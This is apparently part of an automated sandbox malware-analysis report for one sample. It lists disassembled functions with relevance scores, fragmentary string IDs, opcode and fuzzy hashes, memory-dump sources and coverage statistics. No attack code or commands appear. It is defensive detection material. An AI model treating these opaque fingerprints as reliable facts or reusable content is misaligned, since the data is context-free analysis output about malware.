                                                      • Opcode ID: 151b792c400b4d82afc6ce62358ff3eda43bbe8efe820f8f6239cef991e920dd
                                                      • Instruction ID: bdfc1c9107123f747236eae94639fa5128c9ff24cfdc60913682050230f6c202
                                                      • Opcode Fuzzy Hash: 151b792c400b4d82afc6ce62358ff3eda43bbe8efe820f8f6239cef991e920dd
                                                      • Instruction Fuzzy Hash: A1C130B1D012289EEF20DFA5DC45BEEBBB9AF45304F0041D9D54CAB241E7B55A88CF91
                                                      Function 043CE757 Relevance: 30.2, Strings: 24, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$.$/.$0$3y$4$;$<;$A$F$I$I$K$Y1$]+$a@$h4$i'$w$y.$}$1$X$m
                                                      • API String ID: 0-1776375715
                                                      • Opcode ID: d7b1df8b1ef45f467f5d8afe30b29922ed5acb7e89b2c499a07043de062f34c4
                                                      • Instruction ID: 332442313e3a8991ae0f3ed707849e4898c51df93ec0030c688e265ba1217751
                                                      • Opcode Fuzzy Hash: d7b1df8b1ef45f467f5d8afe30b29922ed5acb7e89b2c499a07043de062f34c4
                                                      • Instruction Fuzzy Hash: B5A146B0C05269CBEB64CF95C9587DEBBB0BB05308F1081D9C54D7B281CBBA1A89CF95
                                                      Function 043E3423 Relevance: 25.2, Strings: 20, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                      • API String ID: 0-3236418099
                                                      • Opcode ID: 2c4b3ccf2ac4a7840a70c26d5e7e392f9350a833e375596fdfdd7277bb7b7f47
                                                      • Instruction ID: ce587d324f232df3c2a65a49f86273292a0f4d0888e1632cc693eaa45c999669
                                                      • Opcode Fuzzy Hash: 2c4b3ccf2ac4a7840a70c26d5e7e392f9350a833e375596fdfdd7277bb7b7f47
                                                      • Instruction Fuzzy Hash: 139162B1D01228AAEB20EF95DC81FFE77BDAF44704F105199E508A6180EB756B84CFA1
                                                      Function 043E341B Relevance: 25.1, Strings: 20, Instructions: 131COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                      • API String ID: 0-3236418099
                                                      • Opcode ID: a638dfc902b0730552bb4c5b24b57b21bfda542023a9963ca2123f659284f6ca
                                                      • Instruction ID: 3be884e8613f16cd0c7e966b0b2ccd5d420df925382fdbe571a9f11c23a85ce6
                                                      • Opcode Fuzzy Hash: a638dfc902b0730552bb4c5b24b57b21bfda542023a9963ca2123f659284f6ca
                                                      • Instruction Fuzzy Hash: BA514FB0901328DFEB21DF96C848BEDBBF9BF04308F1051A99508A7591D7B56AD8CF91
                                                      Function 043DEE13 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 30f06580155c9458c8f4394c24253d06d644f92f83447c5ff7e6dded775ca5bd
                                                      • Instruction ID: 0e7615405e12106a650e59db1f8b0b6cbb8c736206f91af795f47e2f9bd9633e
                                                      • Opcode Fuzzy Hash: 30f06580155c9458c8f4394c24253d06d644f92f83447c5ff7e6dded775ca5bd
                                                      • Instruction Fuzzy Hash: F97145B1D11228AAEB25DF95CC81FEEB77DBF04704F04419DE609A7180E77067488F95
                                                      Function 043DEE0B Relevance: 16.4, Strings: 13, Instructions: 175COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 0094d48185aea198ba7f7ca39f1dae70c6b894dc7ffdf2f858fb00b8cab4908a
                                                      • Instruction ID: 21fc42df7aaf96991cd76ab471f4288009d0a818c3d8f0e67f430619d5ed09ac
                                                      • Opcode Fuzzy Hash: 0094d48185aea198ba7f7ca39f1dae70c6b894dc7ffdf2f858fb00b8cab4908a
                                                      • Instruction Fuzzy Hash: 026143B1D01228AAEB25DFA5CC81FEEB77DBF04704F04519DE609A7180E77067488FA5
                                                      Function 043DA103 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                                      • API String ID: 0-2356907671
                                                      • Opcode ID: f5a04e67e5407104d745c299d407ac362515eb28a16dc14c91484a81286de769
                                                      • Instruction ID: a34def61ed56427eec4a5224c0650b3528436ff85c96df9fa27246e12c22148c
                                                      • Opcode Fuzzy Hash: f5a04e67e5407104d745c299d407ac362515eb28a16dc14c91484a81286de769
                                                      • Instruction Fuzzy Hash: 1A81A6B2D11328AAFB50EBA5DC81FEF73BCAF44704F045499B508A6180EB756758CFA1
                                                      Function 043D2F53 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: 53285f68657777a36f501b7474ec087e708e2608884932ca64db2c8cebb12725
                                                      • Instruction ID: f61f619bad9a0987acfbd45007879dbdd3a7b4ef61e4728d55db2bdec49ec36e
                                                      • Opcode Fuzzy Hash: 53285f68657777a36f501b7474ec087e708e2608884932ca64db2c8cebb12725
                                                      • Instruction Fuzzy Hash: E52173B1D41218AAEF54DFE4DC45FEEBBB9AF04704F10815CE608BA180DBB52648CBA5
                                                      Function 043D2F4E Relevance: 13.8, Strings: 11, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: 352da6b1271b40acd8220e7317dd3233a1d4e0de3edc975fb75aca45abd75446
                                                      • Instruction ID: bf87250a1aff1cb4f18d8e652f81eb69e0c6b0093f0d921f5529a4d5cd9231e5
                                                      • Opcode Fuzzy Hash: 352da6b1271b40acd8220e7317dd3233a1d4e0de3edc975fb75aca45abd75446
                                                      • Instruction Fuzzy Hash: FC2161B1D41218AAEF54DFE4DC85FEEBBB9AF04704F10815CE6087A180DBB516488FA5
                                                      Function 043E38C3 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                      • API String ID: 0-2304485323
                                                      • Opcode ID: 2198a396df32652b76b901be7462212d57e7807683e98e384d4d9417d6610c7b
                                                      • Instruction ID: d40c02a83ec3e0fab7ec9a9c51e2541a19101f716a893398175928c815344469
                                                      • Opcode Fuzzy Hash: 2198a396df32652b76b901be7462212d57e7807683e98e384d4d9417d6610c7b
                                                      • Instruction Fuzzy Hash: D0D1E9B1A11319EBEB50DFA5CC85FEEB3F8AF48304F044519E509D7180EB78A9458BA1
                                                      Function 043E38BF Relevance: 12.7, Strings: 10, Instructions: 209COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :$:$:$A$I$N$P$m$s$t
                                                      • API String ID: 0-2304485323
                                                      • Opcode ID: 24a3df187529c26c3247d6929e877682103f1c212ae672ddc7eba20cb5e29885
                                                      • Instruction ID: 4ddad11d270f5aee8896e090ce2a33603e2cd52e0b58c3595280858f09b08d91
                                                      • Opcode Fuzzy Hash: 24a3df187529c26c3247d6929e877682103f1c212ae672ddc7eba20cb5e29885
                                                      • Instruction Fuzzy Hash: F68108B1A11318EFEB50DFE5C885BEEB7F8AF58304F004529E509E7280EB75A5058BA5
                                                      Function 043C7ED5 Relevance: 11.3, Strings: 9, Instructions: 48COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DY[Z$E[$K3KZ$QX\E$[BK,$[EZ[$[[Z[$^E[K$k
                                                      • API String ID: 0-434531633
                                                      • Opcode ID: a33d852ed834e8a2e6c4da783a13c88790db12b70b578efed11885a23c7533a1
                                                      • Instruction ID: 514de902b80500564ab1b287a27fb9fee2637085015b33d3e5761dda8721448b
                                                      • Opcode Fuzzy Hash: a33d852ed834e8a2e6c4da783a13c88790db12b70b578efed11885a23c7533a1
                                                      • Instruction Fuzzy Hash: 071133B0C192489BDB20CFE0E6896DEFFB0BF05209F208158D46A3B241C774965ACF86
                                                      Function 043C7EE3 Relevance: 11.3, Strings: 9, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: DY[Z$E[$K3KZ$QX\E$[BK,$[EZ[$[[Z[$^E[K$k
                                                      • API String ID: 0-434531633
                                                      • Opcode ID: d79e7610e9335ffe9811c1885a2505219b90855aa4aacd7aa289fecb8b9c5881
                                                      • Instruction ID: 7f101d76df899c88991ac75b2005754ece617ce3cf4b1e7c90b2f6239cdf15a1
                                                      • Opcode Fuzzy Hash: d79e7610e9335ffe9811c1885a2505219b90855aa4aacd7aa289fecb8b9c5881
                                                      • Instruction Fuzzy Hash: 211113B0C1524C9BDB24DFD4E68569EFFB0BF05709F208058D46A3B240C774A65ACF96
                                                      Function 043E67F3 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: e02eb0ceddfcc0dfa5b492598a6e6dd2d4a15c8c975013e4d0e3246c5d4516fd
                                                      • Instruction ID: bf0224bf95fd0834485ef2faa2605e1bb62d2d55a5abc485a738d06a8ec9dddf
                                                      • Opcode Fuzzy Hash: e02eb0ceddfcc0dfa5b492598a6e6dd2d4a15c8c975013e4d0e3246c5d4516fd
                                                      • Instruction Fuzzy Hash: C241D472C11228ABDB20DFA5DC85EFEB7F8EF48714F01525AE90CA7180E77166818BD1
                                                      Function 043CB5B3 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $ $W$\$l$l$v
                                                      • API String ID: 0-243392691
                                                      • Opcode ID: 792e5c57c365bd0d34c46f9893f77b12d796ffc95824588b386c9c1c820656dc
                                                      • Instruction ID: 635b622f574f9d87b8610040edb6d87ede3ca89163a9af2474e06c76223555df
                                                      • Opcode Fuzzy Hash: 792e5c57c365bd0d34c46f9893f77b12d796ffc95824588b386c9c1c820656dc
                                                      • Instruction Fuzzy Hash: 7011FC10D087CAD9DB12C7BC94086AEFF711B23228F0882C9D5E52A2D2C27A5615C7B6
                                                      Function 043DEBE3 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: fa95c83fc323f10a6f3fe70e76ef13f04c5c24cebcd5108263ee0b8e4f873d76
                                                      • Instruction ID: 1bce7c67a073a35aa8bda28e3830b990ff868026cd1389deb5980cc00bb7ab6c
                                                      • Opcode Fuzzy Hash: fa95c83fc323f10a6f3fe70e76ef13f04c5c24cebcd5108263ee0b8e4f873d76
                                                      • Instruction Fuzzy Hash: 8C513172900714AAEB34DFA5DC4ABEAB7F8EF08705F04551EE5096A1C0E7B4B644CBE1
                                                      Function 043DEBD5 Relevance: 7.6, Strings: 6, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: F$P$T$f$r$x
                                                      • API String ID: 0-2523166886
                                                      • Opcode ID: c68de6e858e82851b3aa2ebf5fd9fb60fe4a845956926dfffdab147709f7923b
                                                      • Instruction ID: 36150b215ce15d578cdf28114215eb32e1e3dcf8591f2277f4a1c5c1ed928153
                                                      • Opcode Fuzzy Hash: c68de6e858e82851b3aa2ebf5fd9fb60fe4a845956926dfffdab147709f7923b
                                                      • Instruction Fuzzy Hash: E90126B2C453546EEB12DFF4A9045EE7F74BF42364B00459BD808AF251E3B65A088791
                                                      Function 043DDFC5 Relevance: 6.5, Strings: 5, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $TRUE$e$k$o
                                                      • API String ID: 0-953628582
                                                      • Opcode ID: 82420845ce8c715ba6e1b3bde43c918fe42e3e7d24451a2e40047782b5afe3db
                                                      • Instruction ID: 41e56c932aeae342330e2a755aaac071330d32f5a59f5c2d669cc51cb0b60a2f
                                                      • Opcode Fuzzy Hash: 82420845ce8c715ba6e1b3bde43c918fe42e3e7d24451a2e40047782b5afe3db
                                                      • Instruction Fuzzy Hash: E37140B6A00704ABDB14DFA5DC85FEFB7BDAF88704F104558F6199B280D770AA41CBA0
                                                      Function 043DE333 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: c92cece04023e21e992b2a6a2cfeed121510f802eb94dab0e6d11126572fff87
                                                      • Instruction ID: efb532071df49d4a063c77331476f9e8b020bd9cf89b830c9c7f705fca6a83d1
                                                      • Opcode Fuzzy Hash: c92cece04023e21e992b2a6a2cfeed121510f802eb94dab0e6d11126572fff87
                                                      • Instruction Fuzzy Hash: 6F613FB2A00704ABDB24DFA4DC81FEFBBFDAF48714F104559E519AB240E674BA44CB61
                                                      Function 043DE32E Relevance: 6.4, Strings: 5, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: ef32853230a6f0aa14fa3b269022f8d52b50c2f7b9921d1d0bcb17009c17486b
                                                      • Instruction ID: 0d712e73d853b482bc8964c76e54ea5304051629a1be5996389abcc85ec9b615
                                                      • Opcode Fuzzy Hash: ef32853230a6f0aa14fa3b269022f8d52b50c2f7b9921d1d0bcb17009c17486b
                                                      • Instruction Fuzzy Hash: D74121B2900708AFDB60DFA4D885FEFBBFDAF48704F104559E519A7240D770AA40CB60
                                                      Function 043DA433 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 7$G$J$Q$y
                                                      • API String ID: 0-1151913462
                                                      • Opcode ID: 4b9c175124d962afa06058dbe56b826565776651e40c825d53011fe36ff68b89
                                                      • Instruction ID: 8376397f2f8c80a3f83b2297fc7587348827264337d4ebfda3fbbb58fc0ad799
                                                      • Opcode Fuzzy Hash: 4b9c175124d962afa06058dbe56b826565776651e40c825d53011fe36ff68b89
                                                      • Instruction Fuzzy Hash: 4F3164B1E11119ABEB10DBA4DD41FFE73B8EF04308F109199E908A7280E775AB048BE5
                                                      Function 043DDFD3 Relevance: 5.3, Strings: 4, Instructions: 298COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 66943b9a3a9ee200681626330ba4238d3ea38232a8ea8f50ff94954c39e177bb
                                                      • Instruction ID: c0b3a508888dcf1cd669e70564c5c0da2fdae9984ba18d8d4a3d9c87a9a5e060
                                                      • Opcode Fuzzy Hash: 66943b9a3a9ee200681626330ba4238d3ea38232a8ea8f50ff94954c39e177bb
                                                      • Instruction Fuzzy Hash: F0B10EB6A00704AFDB24DFA4DC85FEFB7F9AF88704F108558F6599B280D674AA41CB50
                                                      Function 043DE8D3 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: 515f5d56dfddf8ff8b42f01515523499ee8bfa182538aefa11c0bcccda3887a7
                                                      • Instruction ID: fc07be36c67f9f5a277223223af8305a20fa9cf8894e3dd8bf96282a602738ef
                                                      • Opcode Fuzzy Hash: 515f5d56dfddf8ff8b42f01515523499ee8bfa182538aefa11c0bcccda3887a7
                                                      • Instruction Fuzzy Hash: A2717472E002287EEF65EB55DC85FEF73BCAF85604F005199B54996040EE747B848FA2
                                                      Function 043DDE85 Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 484d485da9283b870b464368bf145e5569316716aefe80b274688f1039c5e403
                                                      • Instruction ID: 5353abba2b14efde66219f8fbc6f4eba6325164ea7f12310d7ddd7ddc53ecf93
                                                      • Opcode Fuzzy Hash: 484d485da9283b870b464368bf145e5569316716aefe80b274688f1039c5e403
                                                      • Instruction Fuzzy Hash: 68416F719522687AFB01EBA1CC42FFF7B7C9F65605F005049FA04AA1C0E7B46B1187EA
                                                      Function 043DDE93 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 5d863bc5ee99301b1a0be0b63871539ec7459951edd7588ae86d8825145e22a3
                                                      • Instruction ID: 4024b57aff491774c918ca89cd711a4f1bfd7a003b005854bb8795d8dc07f547
                                                      • Opcode Fuzzy Hash: 5d863bc5ee99301b1a0be0b63871539ec7459951edd7588ae86d8825145e22a3
                                                      • Instruction Fuzzy Hash: 10313BB19522287AFB01EB91CC42FFF773CAF55605F005049FA046A1C0EBB46B1587EA
                                                      Function 043DE8C7 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: b99570132ff0159e6634f778ea2bb5732b09d921f4c3fdcb2464c344ea086f87
                                                      • Instruction ID: fa9270d7cdbde9237ffc0de8682fd2ae20b819310b0f0884916dd7bb27c85a1f
                                                      • Opcode Fuzzy Hash: b99570132ff0159e6634f778ea2bb5732b09d921f4c3fdcb2464c344ea086f87
                                                      • Instruction Fuzzy Hash: 73415371E40228BEEF50DB64CC45FEE73B8EF45704F0055DAA54CA6140EB746B848FA2
                                                      Function 043DB876 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 271e477dc3f40e7bb517306d9b976ff0acf75f59f3d7e981f6f1ce304b6dccfd
                                                      • Instruction ID: 1ab7b0abf898c45c4391d894fbae9c28c0a0fcd5ce1f8eef1633a6a15674b235
                                                      • Opcode Fuzzy Hash: 271e477dc3f40e7bb517306d9b976ff0acf75f59f3d7e981f6f1ce304b6dccfd
                                                      • Instruction Fuzzy Hash: 171106B2900218ABEB14CF98D8C1EDEF7B9FF44304F14820DE8196B245E771A948CBA0
                                                      Function 043DB883 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.3299760610.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 043B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_43b0000_tiwTBKVufjvhPL.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: ab9fc62c3d397ce8b14ed7da0bf9d4c2f1d758f269f53f755fc03860c9576517
                                                      • Instruction ID: cdd785060138ff6361128446668721708c1498d1c7c54ed354713a080f9eb18e
                                                      • Opcode Fuzzy Hash: ab9fc62c3d397ce8b14ed7da0bf9d4c2f1d758f269f53f755fc03860c9576517
                                                      • Instruction Fuzzy Hash: 190104B290021CABDB14DF99D8C5ADEF7B9FF08304F048219E9099B201E771A544CBA0

                                                      Execution Graph

                                                      Execution Coverage:2.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:1.7%
                                                      Total number of Nodes:418
                                                      Total number of Limit Nodes:64
